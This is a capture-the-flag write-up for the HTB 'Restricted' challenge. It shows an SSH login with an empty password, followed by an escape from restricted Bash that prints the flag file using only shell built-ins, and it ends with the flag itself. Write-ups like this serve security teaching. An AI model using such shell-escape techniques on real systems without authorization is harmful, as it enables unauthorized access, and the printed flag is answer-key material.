<- HTB CYBER APOCALYPSE

Restricted

3 minutes to read

We are given a remote instance to connect to:

$ nc 64.227.41.83 30543
SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1  

Invalid SSH identification string.


Ncat: Broken pipe.

It looks like we must access via SSH.

SSH connection

We are also given some files:

$ tree
.
├── Dockerfile
├── build_docker.sh
└── src
    ├── bash_profile
    ├── flag.txt
    └── sshd_config

2 directories, 5 files

Loooking at the Dockerfile, we see that the user is named restricted and we will be using rbash (restricted Bash):

FROM debian:latest

RUN apt update -y && apt upgrade -y && apt install openssh-server procps -y

RUN adduser --disabled-password restricted
RUN usermod --shell /bin/rbash restricted
RUN sed -i -re 's/^restricted:[^:]+:/restricted::/' /etc/passwd /etc/shadow

RUN mkdir /home/restricted/.bin
RUN chown -R restricted:restricted /home/restricted

RUN ln -s /usr/bin/top /home/restricted/.bin
RUN ln -s /usr/bin/uptime /home/restricted/.bin
RUN ln -s /usr/bin/ssh /home/restricted/.bin

COPY src/sshd_config /etc/ssh/sshd_config
COPY src/flag.txt /flag.txt
COPY src/bash_profile /home/restricted/.bash_profile

RUN chown root:root /home/restricted/.bash_profile
RUN chmod 755 /home/restricted/.bash_profile
RUN chmod 755 /flag.txt

RUN mv /flag.txt /flag_`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1`  

RUN ssh-keygen -A
RUN mkdir -p /run/sshd

EXPOSE 1337

ENTRYPOINT ["/usr/sbin/sshd", "-D", "-o", "ListenAddress=0.0.0.0", "-p", "1337"]

Also, empty password is allowed in the SSH configuration (src/sshd_config):

$ cat src/sshd_config | grep -vE '^#|^$'
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server  
Match user restricted
    PermitEmptyPasswords yes

So, let’s get access:

$ ssh restricted@64.227.41.83 -p 30543
restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$

Basic reconnaissance

Using some simple commands, we see that we don’t have many commands available:

restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$ whoami  
-rbash: whoami: command not found
restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$ id
-rbash: id: command not found
restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$ ls
-rbash: ls: command not found
restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$ cat
-rbash: cat: command not found

We confirm that we are inside a restricted Bash.

Built-in commands

However, we can still use built-in commands like echo, read or printf. And use loops and conditional statements (while, for, if-else…).

In this challenge we must read the flag using these built-in commands (more information at HackTricks).

The way I solved the challenge was using this Bash sentence:

while read line; do echo $line; done < /flag*

What it means is that Bash will read lines from a file until the EOF (end-of-file) signal and print it using echo. Then, using <, we are passing a file so that read uses that as file descriptor to read from. Finally, we need to add a wildcard /flag* because the flag filename is randomized when the Docker container starts (it is shown in the Dockerfile).

Flag

And there’s the flag:

restricted@ng-restricted-cbu9d-649588ff4f-qklkq:~$ while read line; do echo $line; done < /flag*  
HTB{r35tr1ct10n5_4r3_p0w3r1355}